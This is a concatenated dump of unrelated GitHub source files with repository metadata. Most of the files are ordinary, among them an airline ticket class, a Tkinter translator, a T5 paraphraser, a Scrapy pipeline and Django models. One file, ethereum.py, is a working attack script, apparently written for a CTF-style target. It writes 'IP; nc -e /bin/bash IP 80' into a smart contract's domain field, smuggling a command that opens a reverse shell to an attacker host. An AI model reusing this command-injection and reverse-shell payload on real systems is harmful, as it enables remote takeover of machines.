y_val_pred2 = rf2.predict_proba(X_val)
y_val_pred_acc2 = rf2.predict(X_val)
print(log_loss(y_val, y_val_pred2))
print(accuracy_score(y_val, y_val_pred_acc2))
'''
| [
"noreply@github.com"
] | christinaengg.noreply@github.com |
cdb79ea8caba3f6c50aa01864708c24b7b86a2c7 | bd7ce346d7579ab7699de7cc49e27fe6df8a8897 | /Aeroporto/Classes/VendaPassagem.py | 6d631cd3076b3d57df7afe83ec36b53ab751af4d | [] | no_license | MatheusEmanuel/aeroporto-atv-poo | 23978311c012e34199dbec14e67716c1dab6d418 | e8a9187952fac92fb34087ceed6d4f932ead09af | refs/heads/main | 2023-08-29T11:42:20.339003 | 2021-09-15T20:56:55 | 2021-09-15T20:56:55 | 304,124,888 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,155 | py | #Author: Matheus Emanuel Cincinato Pinto
#coding: utf-8
from Passageiro import Passageiro
from Passagem import Passagem
from Companhia import Companhia_Aerea
from TipoVoo import VooTipo
class Venda_de_Passagem(Passageiro,Passagem,Companhia_Aerea,VooTipo):
def __init__(self):
self._Definir_Companhia()
self._Vender_Passagem()
self._DefinirTipoVoo()
self._ImprimirPassagem()
@classmethod
def _Vender_Passagem(cls):
cls._Add_Dados_Passageiro()
cls._Definir_Passagem()
@classmethod
def _ImprimirPassagem(cls):
if (cls._TipoVoo == '1'):
print("\n" + "=" * 79 + "\n" + "=" * 34 + " PASSAGEM " + "=" * 35 + "\n" + "=" * 79 + "\n")
print("\n\t\t{} AGRADECE A PREFERENCIA.\n"
"\n\t\tDados da Passageiro"
"\n\t\t\tNome: {}"
"\n\t\t\tCPF: {}"
"\n\t\t\tRG: {}"
"\n\t\tDADOS DA PASSAGEM"
"\n\t\t\tOrigem: {}"
"\n\t\t\tDestino: {}"
"\n\t\t\tData ida/volta: {} - {}"
"\n\t\t\tHorario partida ida/volta: {} - {}"
"\n\t\t\tPreço: {}".format(cls._Companhia,cls._Nome,cls._CPF,cls._RG,cls._Origem,cls._Destino,cls._Ida,cls._Volta,cls._HoraPart1,cls._HoraPart2,cls._Preco))
print("\n" + "=" * 79 + "\n" + "=" * 79)
elif (cls._TipoVoo == '2'):
print("\n" + "=" * 79 + "\n" + "=" * 35 + " PASSAGEM " + "=" * 35 + "\n" + "=" * 79 + "\n")
print("\n\t\t{} AGRADECE A PREFERENCIA.\n"
"\n\t\tDados da Passageiro"
"\n\t\t\tNome: {}"
"\n\t\t\tCPF: {}"
"\n\t\t\tRG: {}"
"\n\t\tDADOS DA PASSAGEM"
"\n\t\t\tOrigem: {}"
"\n\t\t\tDestino: {}"
"\n\t\t\tData ida: {}"
"\n\t\t\tHorario partida: {}"
"\n\t\t\tPreço: {}".format(cls._Companhia,cls._Nome,cls._CPF,cls._RG,cls._Origem,cls._Destino,cls._Ida,cls._HoraPart1,cls._Preco))
print("\n" + "=" * 79 + "\n" + "=" * 79) | [
"matheus_cincinato@hotmail.com"
] | matheus_cincinato@hotmail.com |
a1110aec6eae56b65bf086881a86a5462e6ae5c8 | 0aea301f1a9ae329302865ffcd86cccdec3ba358 | /ultimate translator 1.0.py | 4899df658190f6adb739f024d2941d967fd6b578 | [] | no_license | abhishekmishramm1997/The-Ultimate-Translator | 9cfa76c1dd166ca725f993c4075facfb813a985f | 2c8ff7bf8a99dc387bdd3b25c3a493279672c7fb | refs/heads/master | 2021-01-20T12:49:34.961844 | 2017-04-28T09:18:52 | 2017-04-28T09:18:52 | 90,412,323 | 0 | 0 | null | 2017-05-05T20:05:15 | 2017-05-05T20:05:15 | null | UTF-8 | Python | false | false | 4,893 | py | from Tkinter import *
from gtts import gTTS
import os
from translate import Translator
root = Tk()
root.title("The Ultimate Translator")
var1 = StringVar(root)
var1.set("Choose Language")
var2 = StringVar(root)
var2.set("Choose Language")
var3 = StringVar(root)
var3.set("Choose Accent")
drop_menu=OptionMenu(root,var1,'Arabic', 'Bengali', 'Catalan', 'Chinese', 'Czech', 'Danish', 'Dutch', 'English', 'Finnish', 'French', 'German', 'Greek', 'Hindi', 'Hungarian', 'Indonesian', 'Italian', 'Japanese', 'Korean', 'Latin', 'Latvian', 'Norwegian', 'Polish', 'Portuguese', 'Romanian', 'Russian' , 'Slovak', 'Spanish' , 'Swedish', 'Thai', 'Turkish', 'Vietnamese', 'Welsh')
drop_menu.grid(row=1,column=0, pady=15, padx=15)
drop_menu=OptionMenu(root,var2,'Arabic', 'Bengali', 'Catalan', 'Chinese', 'Czech', 'Danish', 'Dutch', 'English', 'Finnish', 'French', 'German', 'Greek', 'Hindi', 'Hungarian', 'Indonesian', 'Italian', 'Japanese', 'Korean', 'Latin', 'Latvian', 'Norwegian', 'Polish', 'Portuguese', 'Romanian', 'Russian' , 'Slovak', 'Spanish' , 'Swedish', 'Thai', 'Turkish', 'Vietnamese', 'Welsh')
drop_menu.grid(row=1,column=1, pady=15, padx=15)
drop_menu=OptionMenu(root,var3,'Arabic', 'Bengali', 'Catalan', 'Chinese', 'Czech', 'Danish', 'Dutch', 'English', 'Finnish', 'French', 'German', 'Greek', 'Hindi', 'Hungarian', 'Indonesian', 'Italian', 'Japanese', 'Korean', 'Latin', 'Latvian', 'Norwegian', 'Polish', 'Portuguese', 'Romanian', 'Russian' , 'Slovak', 'Spanish' , 'Swedish', 'Thai', 'Turkish', 'Vietnamese', 'Welsh')
drop_menu.grid(row=1,column=2, pady=15, padx=15)
translation_lang_code='en'
def translate():
    """Translate the entry-box text to the language picked in drop-down 2
    and print the result to the console.

    Reads module-level widgets ``var2`` (target language name) and ``e1``
    (source text).  The ``translate`` library accepts the full language
    name directly, so the old parallel-list lookup that computed an unused
    ``translation_lang_code`` has been removed as dead code.
    """
    translation_lang = var2.get()
    text = e1.get()
    translator = Translator(to_lang=translation_lang)
    translation = translator.translate(text)
    # print(x) with a single argument behaves the same on Python 2 and 3.
    print(translation)
def speak():
    """Translate the entry text to the language picked in drop-down 1,
    synthesise it with gTTS and play the saved MP3.

    Reads module-level widgets ``var1`` (target language) and ``e1``
    (source text).

    Bug fix: ``translation_lang_code`` used to be assigned only when the
    selection matched a known language, so leaving the menu on its
    "Choose Language" placeholder raised UnboundLocalError.  We now fall
    back to English ('en').
    """
    translation_lang = var1.get()
    lang = [ 'Arabic', 'Bengali', 'Catalan', 'Chinese', 'Czech', 'Danish', 'Dutch', 'English', 'Finnish', 'French', 'German', 'Greek', 'Hindi', 'Hungarian', 'Indonesian', 'Italian', 'Japanese', 'Korean', 'Latin', 'Latvian', 'Norwegian', 'Polish', 'Portuguese', 'Romanian', 'Russian' , 'Slovak', 'Spanish' , 'Swedish', 'Thai', 'Turkish', 'Vietnamese', 'Welsh']
    code = ['ar', 'bn', 'ca', 'zh', 'cs', 'da', 'nl', 'en', 'fi', 'fr', 'de', 'el', 'hi', 'hu', 'id', 'it', 'ja', 'ko', 'la', 'lv', 'no', 'pl', 'pt', 'ro', 'ru', 'sk', 'es', 'sv', 'th', 'tr', 'vi', 'cy']
    # gTTS needs the ISO-639 code, not the display name; default to 'en'.
    translation_lang_code = dict(zip(lang, code)).get(translation_lang, 'en')
    text = e1.get()
    translator = Translator(to_lang=translation_lang)
    translation = translator.translate(text)
    tts = gTTS(translation, lang=translation_lang_code)
    tts.save("good.mp3")
    # Play via mpg321 on Unix-like systems; os.startfile covers Windows.
    os.system("mpg321 good.mp3")
    os.startfile('good.mp3')
def accent():
    """Speak the (untranslated) entry text with the voice of the language
    picked in drop-down 3, then play the saved MP3.

    Reads module-level widgets ``var3`` (accent language) and ``e1``
    (source text).

    Bug fix: as in speak(), ``translation_lang_code`` was unassigned when
    the menu was still on its "Choose Accent" placeholder, which raised
    UnboundLocalError; we now fall back to English ('en').
    """
    translation_lang = var3.get()
    lang = [ 'Arabic', 'Bengali', 'Catalan', 'Chinese', 'Czech', 'Danish', 'Dutch', 'English', 'Finnish', 'French', 'German', 'Greek', 'Hindi', 'Hungarian', 'Indonesian', 'Italian', 'Japanese', 'Korean', 'Latin', 'Latvian', 'Norwegian', 'Polish', 'Portuguese', 'Romanian', 'Russian' , 'Slovak', 'Spanish' , 'Swedish', 'Thai', 'Turkish', 'Vietnamese', 'Welsh']
    code = ['ar', 'bn', 'ca', 'zh', 'cs', 'da', 'nl', 'en', 'fi', 'fr', 'de', 'el', 'hi', 'hu', 'id', 'it', 'ja', 'ko', 'la', 'lv', 'no', 'pl', 'pt', 'ro', 'ru', 'sk', 'es', 'sv', 'th', 'tr', 'vi', 'cy']
    # Map the display name to the gTTS ISO-639 code; default to 'en'.
    translation_lang_code = dict(zip(lang, code)).get(translation_lang, 'en')
    text = e1.get()
    tts = gTTS(text, lang=translation_lang_code)
    tts.save("good.mp3")
    # Play via mpg321 on Unix-like systems; os.startfile covers Windows.
    os.system("mpg321 good.mp3")
    os.startfile('good.mp3')
# --- Input row, action buttons, and main loop ------------------------------
Label(root, text="Enter Text in English").grid(row=0)
# Single-line entry widget read by all three button handlers above.
e1 = Entry(root, width=34, bg="green")
e1.grid(row=0, column=1, pady=15, padx=15 , columnspan = 20)
Button(root, text='Speak in Language', command=speak).grid(row=3, column=0, pady=15, padx=15)
Button(root, text='Translate', command=translate).grid(row=3, column=1, pady=15, padx=15)
Button(root, text='Speak in Accent', command=accent).grid(row=3, column=2, pady=15, padx=15)
Label(root, text="Translated Text:"). grid(row=5, column=0, pady=15, padx=15)
# Blocks until the window is closed.
root.mainloop()
| [
"noreply@github.com"
] | abhishekmishramm1997.noreply@github.com |
a0cebb757575153ad2bb5bc1bdb9c88feeb14741 | 7deb6623a548af583decbad5b3772611fd051328 | /Synonym_Replacer/Paraphraser.py | 34bbac7ad224f4ef0a9b811b767bb0844787589e | [] | no_license | lzontar/Text_Adaptation_To_Context | a77aa4a16849c30363949964ca351cebbdbf7772 | c87cba96bd10528bcf709d0b8a0a1991a82aec8a | refs/heads/master | 2022-12-10T21:28:41.314416 | 2020-08-23T18:54:34 | 2020-08-23T18:54:34 | 287,771,498 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,924 | py | import re
import Text_Characteristics.Text_Characteristics as tc
import torch
from transformers import T5ForConditionalGeneration, T5Tokenizer
import Common.library.Common as com
def adapt_complexity_and_polarity(model, tokenizer, device, adaptation_dto, mean_measures, n_iterations, epsilon, text_characteristics, debug):
    """Greedily paraphrase sentences to pull the text's polarity and
    readability toward the target publication type's mean measures.

    For each candidate sentence (while the iteration budget lasts and the
    combined relative difference exceeds ``epsilon``), T5 paraphrases are
    generated; the one that minimises the summed relative distance of
    polarity + Flesch readability from the target means replaces the
    original sentence, but only if it improves on the current text.
    The adapted text is written back into ``adaptation_dto``, which is
    also returned.

    NOTE(review): indentation was reconstructed from a whitespace-stripped
    dump; the nesting below follows the only semantically coherent reading.
    """
    # Sentences presumably come ranked by com.calc_sentence_similarity;
    # each `s` is indexed with s[1] for the sentence text -- TODO confirm.
    sentences,_ = com.calc_sentence_similarity(adaptation_dto.adapted_text())
    text = adaptation_dto.adapted_text()
    # Relative distance of current polarity from the target-type mean.
    rel_polar = abs((adaptation_dto.text_measures()['SENT_ANAL']['POLAR'] - mean_measures['SENT_ANAL'][adaptation_dto.target_pub_type()]['POLAR']) / mean_measures['SENT_ANAL'][adaptation_dto.target_pub_type()]['POLAR'])
    # Relative distance of current readability from the target-type mean.
    rel_read = abs((adaptation_dto.text_measures()['READ'] - mean_measures['READ'][adaptation_dto.target_pub_type()]) / mean_measures['READ'][adaptation_dto.target_pub_type()])
    curr_diff = rel_polar + rel_read
    for s in sentences:
        # Stop when the budget is spent or the text is close enough.
        if n_iterations == 0 or abs(curr_diff) <= epsilon:
            break
        sentences_result = com.split_into_sentences(text)
        paraphrases = generate_sequences(model, tokenizer, device, s[1])
        best_paraphrase = None
        best_paraphrase_text = None
        best_paraphrase_diff = None
        for p in paraphrases:
            # Swap the target sentence for the paraphrase and re-measure.
            replaced_list = [p if x == s[1] else x for x in sentences_result]
            replaced_text = " ".join(replaced_list)
            curr_polar_with_para = text_characteristics.calc_polarity_scores(replaced_text)
            curr_read_with_para = com.flesch_reading_ease(replaced_text)
            rel_polar_with_para = abs((curr_polar_with_para - mean_measures['SENT_ANAL'][adaptation_dto.target_pub_type()]['POLAR']) / mean_measures['SENT_ANAL'][adaptation_dto.target_pub_type()]['POLAR'])
            rel_read_with_para = abs((curr_read_with_para - mean_measures['READ'][adaptation_dto.target_pub_type()]) / mean_measures['READ'][adaptation_dto.target_pub_type()])
            curr_diff_with_para = rel_polar_with_para + rel_read_with_para
            # Keep the paraphrase with the smallest combined distance.
            if best_paraphrase is None or (curr_diff_with_para < best_paraphrase_diff):
                best_paraphrase = p
                best_paraphrase_text = replaced_text
                best_paraphrase_diff = curr_diff_with_para
        # Only commit the replacement if it strictly improves the text.
        if best_paraphrase is not None and best_paraphrase != s[1] and curr_diff > best_paraphrase_diff:
            text = best_paraphrase_text
            if debug:
                print("Replacing '", s[1], "' for '", best_paraphrase, "'")
                print("Relative difference after replacement: ", best_paraphrase_diff)
            curr_diff = best_paraphrase_diff
        n_iterations = n_iterations - 1
    adaptation_dto.adapted_text(text)
    return adaptation_dto
def set_seed(seed):
    """Seed torch's CPU RNG -- and every CUDA device, when CUDA is
    available -- so sampling-based generation is reproducible."""
    torch.manual_seed(seed)
    if not torch.cuda.is_available():
        return
    torch.cuda.manual_seed_all(seed)
def generate_sequences(model, tokenizer, device, sentence):
    """Generate up to 10 distinct T5 paraphrases of ``sentence``.

    The input is wrapped in the "paraphrase: ... </s>" prompt the model
    expects, sampled with top-k=120 / top-p=0.98, and decoded outputs that
    merely repeat the input (case-insensitively) or duplicate an earlier
    candidate are dropped.  Returns a list of paraphrase strings.
    """
    # Fixed seed keeps the sampled paraphrases reproducible across calls.
    set_seed(42)
    text = "paraphrase: " + sentence + " </s>"
    max_len = 256  # NOTE(review): unused; max_length is hard-coded below.
    encoding = tokenizer.encode_plus(text, pad_to_max_length=True, return_tensors="pt")
    input_ids, attention_masks = encoding["input_ids"].to(device), encoding["attention_mask"].to(device)
    # Nucleus/top-k sampling: top_k=120, top_p=0.98, 10 candidates.
    beam_outputs = model.generate(
        input_ids=input_ids, attention_mask=attention_masks,
        do_sample=True,
        max_length=256,
        top_k=120,
        top_p=0.98,
        early_stopping=True,
        num_return_sequences=10
    )
    final_outputs = []
    for beam_output in beam_outputs:
        sent = tokenizer.decode(beam_output, skip_special_tokens=True, clean_up_tokenization_spaces=True)
        # Skip trivial (identical) paraphrases and duplicates.
        if sent.lower() != sentence.lower() and sent not in final_outputs:
            final_outputs.append(sent)
    return final_outputs
| [
"zontarluka98@gmail.com"
] | zontarluka98@gmail.com |
7e2974f9de7a5d5e34105cf131643c825f8338db | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02991/s030157837.py | 6e3b67de9db4e8ee071c1c288612c95cbf324ab6 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 758 | py | import sys
input = sys.stdin.buffer.readline
from collections import deque
def main():
    """BFS over a directed graph where one "move" is exactly three edges.

    Input (stdin): N M, then M edges ``u v`` (1-based), then start S and
    target T.  Prints the minimum number of triple-edge moves needed to
    stand on T exactly at a move boundary, or -1 if unreachable.
    """
    N,M = map(int,input().split())
    # Adjacency list, converted to 0-based node ids.
    edge =[[] for _ in range(N)]
    for _ in range(M):
        u,v = map(int,input().split())
        edge[u-1].append(v-1)
    S,T = map(int,input().split())
    q = deque()
    # go[node][k]: node already visited having taken k steps (mod 3)
    # within the current triple -- 3 states per node.
    go = [[False for _ in range(3)] for _ in range(N)]
    # Queue state: (current node, steps within this triple, triple count).
    q.append((S-1,0,1))
    while q:
        now,step,d = q.popleft()
        if step == 3:
            # A full triple just completed; T must be hit exactly here.
            if now == T-1:
                print(d)
                exit()
            step = 0
            d += 1
        if go[now][step]:
            continue
        go[now][step] = True
        for fol in edge[now]:
            q.append((fol,step+1,d))
    print(-1)
if __name__ == "__main__":
main() | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
3cf805eebecd42487d997e568974b7ddd8ac7f4e | 13de6b83b73c46b8221739edb21594bbc3784879 | /simblefaron/utils/tests/test_get_test_data.py | 361367c8d378c2930c83f983b1dc1702158e05f3 | [] | no_license | I2Cvb/simblefaron | fc068b2d41ffa88c5b67e3c3ae6dd637db868d25 | 053906292b2ab21a76387d519de3043f27ed3bed | refs/heads/master | 2021-01-19T05:20:28.144042 | 2016-06-30T14:46:29 | 2016-06-30T14:46:29 | 61,811,381 | 0 | 1 | null | 2016-06-30T14:46:31 | 2016-06-23T14:25:26 | Python | UTF-8 | Python | false | false | 316 | py | """Test the module get_test_data."""
from __future__ import print_function
from simblefaron.utils import Get_test_data
def test_pipeline():
"""Test the get_test_data function.
.. todo::
ensure that the download and unencripted data has the right SHA1
"""
print('Test Get_test_data')
| [
"sik@visor.udg.edu"
] | sik@visor.udg.edu |
996339b2d5f97720cb4f6779affdae2d70fef420 | d8cbc94a4207337d709a64447acb9c8fe501c75a | /subset_selection/code/cli.py | 54738e4db5034a5f1e4316b6792e9c41b4e53b4e | [
"MIT"
] | permissive | sripathisridhar/acav100m | 6f672384fa723a637d94accbbe11a9a962f5f87f | 13b438b6ce46d09ba6f79aebb84ad31dfa3a8e6f | refs/heads/master | 2023-09-06T01:05:21.188822 | 2021-11-18T08:08:08 | 2021-11-18T08:08:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,111 | py | import time
import datetime
from pathlib import Path
import fire
from args import get_args
from run import run_single
from run_contrastive import run_single_contrastive
from chunk import run_chunks, reduce_all_pkls
from chunk_contrastive import run_chunks_contrastive
from save import merge_all_csvs
from merge_contrastive import merge_contrastive
from tests import compare_measures
class Cli:
    """Fire-exposed command-line interface: each public method becomes a
    subcommand (run / reduce_csvs / reduce_pkls / reduce / ...)."""

    def prepare(self, **kwargs):
        """Build the args object and normalise its input/output paths.

        CLI overrides: ``out_path`` (output CSV or directory),
        ``shards_path`` (data shards), ``meta_path`` (metadata dir;
        defaults to the shard directory's parent when absent).
        Returns the fully prepared args.
        """
        args = get_args(**kwargs)
        if 'out_path' in kwargs:
            args.data.output.path = Path(kwargs['out_path'])
        opath = args.data.output.path
        if opath.stem == opath.name:
            # potential dir: no suffix, so treat it as a directory and
            # place a default file name inside it.
            opath = opath / 'output.csv'
        opath.parent.mkdir(parents=True, exist_ok=True)
        args.data.output.path = opath
        if 'shards_path' in kwargs:
            args.data.path = Path(kwargs['shards_path'])
        if 'meta_path' in kwargs:
            args.data.meta.path = Path(kwargs['meta_path'])
        mpath = args.data.meta.path
        if mpath is None:
            # use shard directory (or its parent, when the shard path
            # itself is a file rather than a directory).
            mpath = args.data.path.parent
            if not mpath.is_dir() and mpath.parent.is_dir():
                mpath = mpath.parent
        args.data.meta.path = mpath
        return args

    def run(self, **kwargs):
        """Run the full selection pipeline, reporting wall-clock time.

        Delegates to the module-level run() dispatcher below.
        """
        start = time.time()
        args = self.prepare(**kwargs)
        run(args)
        elasped = time.time() - start
        elasped = str(datetime.timedelta(seconds=elasped))
        print('done. total time elasped: {}'.format(elasped))

    def reduce_csvs(self, **kwargs):
        """Merge per-chunk CSV caches into the final output, timed."""
        start = time.time()
        args = self.prepare(**kwargs)
        merge_all_csvs(args)
        elasped = time.time() - start
        elasped = str(datetime.timedelta(seconds=elasped))
        print('done. total time elasped: {}'.format(elasped))

    def reduce_pkls(self, **kwargs):
        """Reduce per-chunk pickle caches into the final output, timed."""
        start = time.time()
        args = self.prepare(**kwargs)
        reduce_all_pkls(args)
        elasped = time.time() - start
        elasped = str(datetime.timedelta(seconds=elasped))
        print('done. total time elasped: {}'.format(elasped))

    def reduce(self, **kwargs):
        """Reduce caches, picking CSV or pickle mode from the args."""
        start = time.time()
        args = self.prepare(**kwargs)
        if args.save_cache_as_csvs:
            merge_all_csvs(args)
        else:
            reduce_all_pkls(args)
        elasped = time.time() - start
        elasped = str(datetime.timedelta(seconds=elasped))
        print('done. total time elasped: {}'.format(elasped))

    def compare_measures(self, **kwargs):
        """Run the measure-comparison test suite (module-level function
        of the same name -- the method intentionally shadows it here)."""
        args = self.prepare(**kwargs)
        compare_measures(args)
        print('done')

    def merge_contrastive(self, **kwargs):
        """Merge contrastive results (module-level function of the same
        name; shadowed by this method inside the class)."""
        args = self.prepare(**kwargs)
        merge_contrastive(args)
def run(args):
    """Dispatch to the right pipeline entry point.

    Two flags pick the implementation: whether the measure is
    'contrastive', and whether chunked processing was requested
    (``args.chunk_size`` is not None).
    """
    contrastive = args.measure_name == 'contrastive'
    chunked = args.chunk_size is not None
    dispatch = {
        (True, False): run_single_contrastive,
        (True, True): run_chunks_contrastive,
        (False, False): run_single,
        (False, True): run_chunks,
    }
    dispatch[(contrastive, chunked)](args)
run_chunks(args)
if __name__ == '__main__':
    # Expose Cli's methods as subcommands, e.g. `python cli.py run ...`.
    fire.Fire(Cli)
| [
"sangho.lee@vision.snu.ac.kr"
] | sangho.lee@vision.snu.ac.kr |
7d0bb2145b682a56819a8dc7a30bc7d8561baf3c | 2efbd900dd39b2acd255b7ea9d6a7cc7d1a88b8b | /ethereum.py | dcd0360f3ee29a2ce8fc589cc9a6e428cfcc5dd1 | [] | no_license | dyloot43/web3 | c51a6d5a6c72c27f06686b2a6b6deef0ba770e26 | cda807ef662ffb9e67fcb1a78f14449331d8ff6e | refs/heads/master | 2020-07-18T09:39:31.484065 | 2019-09-04T03:31:10 | 2019-09-04T03:31:10 | 206,223,549 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 926 | py | from web3 import Web3
import json
# CTF/pentest proof-of-concept: drive a deployed WeaponizedPing contract
# over JSON-RPC and write an attacker-controlled value into its `domain`
# field.  Contract address and ABI are read from local files.
with open('address.txt') as fh:
    address = fh.read().replace('\n','')
with open('WeaponizedPing.json') as fh:
    contractData = json.load(fh)
# JSON-RPC endpoint of the target node (placeholders to be filled in).
rpcURL = 'http://ATTACKIPADDRESS:PORT/'
w3 = Web3(Web3.HTTPProvider(rpcURL))
# Send transactions from the node's first (unlocked) account.
w3.eth.defaultAccount = w3.eth.accounts[0]
contract = w3.eth.contract(address = address, abi = contractData['abi'])
# Sanity check first: read the domain, overwrite it, read it back.
print('Current Domain: ' + contract.functions.getDomain().call())
w3.eth.waitForTransactionReceipt(contract.functions.setDomain('YOURIPADDRESS').transact())
print('New Domain: ' + contract.functions.getDomain().call())
#IF THE SCRIPT WORKS SO FAR REPLACE THE BOTTOM TO THE TOP
# Payload: the stored domain smuggles a shell command (netcat reverse
# shell) -- presumably executed by whatever pings the stored domain
# server-side; confirm against the challenge setup.
domain = 'YOUR IPADDRESS; nc -e /bin/bash YOURIPADDRESS 80'
print('Current Domain: ' + contract.functions.getDomain().call())
w3.eth.waitForTransactionReceipt(contract.functions.setDomain(domain).transact())
print('New Domain: ' + contract.functions.getDomain().call())
| [
"noreply@github.com"
] | dyloot43.noreply@github.com |
963c167d44a02ee7f19c26dbeba47a51b216ea2b | 0acd8226bb830f291acc5f9ee24b5ef04c51b401 | /pythons/syn/main.py | 1560acf1ff80e2ca178c8c9270f889a5a1e13d67 | [] | no_license | jiafangtao/web_programming | f97eb884487afdbe5a0477f7b54d36546ce670db | 33f8943c91330c30677aa0518f21eb823441e344 | refs/heads/master | 2023-08-31T18:11:45.335547 | 2023-08-08T06:36:44 | 2023-08-08T06:36:44 | 90,827,978 | 0 | 0 | null | 2023-08-08T06:36:45 | 2017-05-10T06:19:59 | JavaScript | UTF-8 | Python | false | false | 750 | py |
class SomeType(object):
    """Demo class showing how a classmethod rebinds class-level state."""

    # Class attribute shared by all instances until rebound.
    typeName = "Some Fancy Type"

    @classmethod
    def change_type_name(cls, new_type_name):
        """Rebind ``typeName`` on the class, logging before and after."""
        before = cls.typeName
        print("<debug> I want to know the original class variable '{}'".format(before))
        cls.typeName = new_type_name
        after = cls.typeName
        print('typeName was changed to "{}"'.format(after))

    def __init__(self, sku="unknown"):
        """Store the SKU and echo the type name twice: once through the
        instance lookup, once directly through the class."""
        self._sku = sku
        print(self.typeName)
        print(SomeType.typeName)
print(SomeType.typeName)
if __name__ == '__main__':
    # Demo: read the class attribute, create instances, then rebind the
    # class attribute via the classmethod and create another instance.
    print('start hacking...')
    print(SomeType.typeName)
    print("creating object st......")
    st = SomeType("iphonex_256_black")
    st.change_type_name("ugly type")
    print("creting object another st......")
    another_st = SomeType("jeep2019_4x")
| [
"bruce.jia@autodesk.com"
] | bruce.jia@autodesk.com |
05cc7ee1f93c729b0070292a6f1440ac972ef77d | ae2eafa1c12fa86ab615f9a6ae9fd1b29097d842 | /urlspider/urlspider/pipelines.py | 50bb10682711607335a524f3038d3e35cebff5a3 | [] | no_license | StarryPath/urlspider--v2.0 | 44b99c8fabbee12a3ff9c78a536c6fc4799f0e12 | f731fd8520ac62afb086dcee5d171b655da7bee0 | refs/heads/master | 2021-08-23T20:19:56.065838 | 2017-12-06T11:17:05 | 2017-12-06T11:17:05 | 113,306,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,627 | py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
from scrapy import signals
import json
import codecs
from twisted.enterprise import adbapi
from datetime import datetime
from hashlib import md5
import time
import MySQLdb
import MySQLdb.cursors
# NOTE(review): module-level timestamp captured at import time; it is
# never read anywhere in this file -- candidate for removal.
a=int(time.time())
class UrlspiderPipeline(object):
def __init__(self):
try:
self.dbpool = adbapi.ConnectionPool('MySQLdb',
host='localhost',
db='test',
user='root',
passwd='',
cursorclass=MySQLdb.cursors.DictCursor,
charset='utf8',
use_unicode=True
)
print "Connect to db successfully!"
except:
print "Fail to connect to db!"
def process_item(self, item, spider):
self.dbpool.runInteraction(self.insert_into_table, item)
return item
def insert_into_table(self, conn, item):
sql = "insert ignore into biao4(url,flag) values(%s,%s) "
param = (item['url'],item['flag'])
conn.execute(sql, param)
sql2 = "insert into biao5(fromWhere,toWhere) values(%s,%s) "
param2 = (item['fromWhere'],item['url'])
conn.execute(sql2, param2) | [
"noreply@github.com"
] | StarryPath.noreply@github.com |
8682d297b669ec8bf068024bf83d1af0809f578d | 1d44dde530578dade69f004c5828e31eee28cb55 | /questions/urls.py | 1ed06151fa2e7fc4cb3cb03915d105509f8997b1 | [] | no_license | SmartFastSolution/socialprojectupse | 98fe15c6d6499356bce32e8b25a1139a6c31b535 | d0fcecdf6bd033836952af400cb4b54a485f21b8 | refs/heads/master | 2023-07-19T03:57:45.261985 | 2021-08-26T19:08:27 | 2021-08-26T19:08:27 | 385,042,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | from django.urls import path
from .views import QuestionView,ResultView,ReportView
from questions import views
# URL routes for the questions app: question list, result, and report views.
urlpatterns = [
    path('',QuestionView.as_view(),name="q_list"),
    path('result/', ResultView.as_view(), name='result'),
    path('report/', ReportView.as_view(), name='report')
] | [
"70552382+SmartFastSolution@users.noreply.github.com"
] | 70552382+SmartFastSolution@users.noreply.github.com |
4bb0c78ca364137100e6cdc76d895a163a064c7e | 323721fbefefb26c4b61fec63c29ee7e0f2ce83d | /seolog/article/models.py | 6d1fc43da6b108b755709e684ce059d2eb964c70 | [] | no_license | asghara04/seolog | 4fa52febf2ffb7e7a3c7b1e3ff50c6870abaf57f | c80925221d6aa45f239ef7f28565876b7b9eb33f | refs/heads/master | 2023-06-26T09:15:32.777179 | 2021-07-05T18:06:14 | 2021-07-05T18:06:14 | 379,360,773 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 799 | py | from django.db import models
from django.contrib.auth.models import User
class Article(models.Model):
    """Blog article: title/slug/image/description/body, owned by a User."""

    # Headline shown in listings and on the detail page.
    title = models.CharField(
        max_length=250,
        verbose_name="title"
    )
    # URL-safe identifier; unique across all articles.
    slug = models.SlugField(
        max_length=250,
        verbose_name="slug",
        unique=True
    )
    # Cover image, stored under a year/month upload path.
    image = models.ImageField(
        upload_to="Article Images/%Y/%m",
        verbose_name="image"
    )
    # Short teaser text.
    description = models.TextField(
        max_length=400,
        verbose_name="description"
    )
    # Full article body.
    body = models.TextField(
        max_length=10000,
        verbose_name="body"
    )
    # Deleting the user deletes their articles (CASCADE).
    author = models.ForeignKey(
        User,
        on_delete=models.CASCADE,
        verbose_name="author"
    )
    # Set once on creation / refreshed on every save, respectively.
    pubdate = models.DateTimeField(auto_now_add=True)
    update = models.DateTimeField(auto_now=True)
    objects = models.Manager()

    def __str__(self):
        # Human-readable representation used by the admin and shell.
        return self.title

    class Meta:
ordering = ("-id",) | [
"asgharale2021@gmail.com"
] | asgharale2021@gmail.com |
ab2476f61c29443a074f4e51a9e0c5e84be187ce | 1d8d77e2eaff30218d4c04cc50e051540bed9624 | /train.py | c1ba0004705fb6e347c1a49a83f9e0b2aabd8d87 | [
"MIT"
] | permissive | anoop600/Traffic-Sign-Analysis-CNN | 42c91253a7de35990412bf09f6ae9838ab690536 | a2a81cc0e31f5beec3992b9a5f38d462390da2b6 | refs/heads/master | 2020-03-26T09:29:10.833778 | 2018-08-14T17:24:13 | 2018-08-14T17:24:13 | 144,751,061 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,207 | py | #!/usr/bin/env python
# # Self-Driving Car
#
# ## CNN Based Traffic Sign Recognition Classifier
#
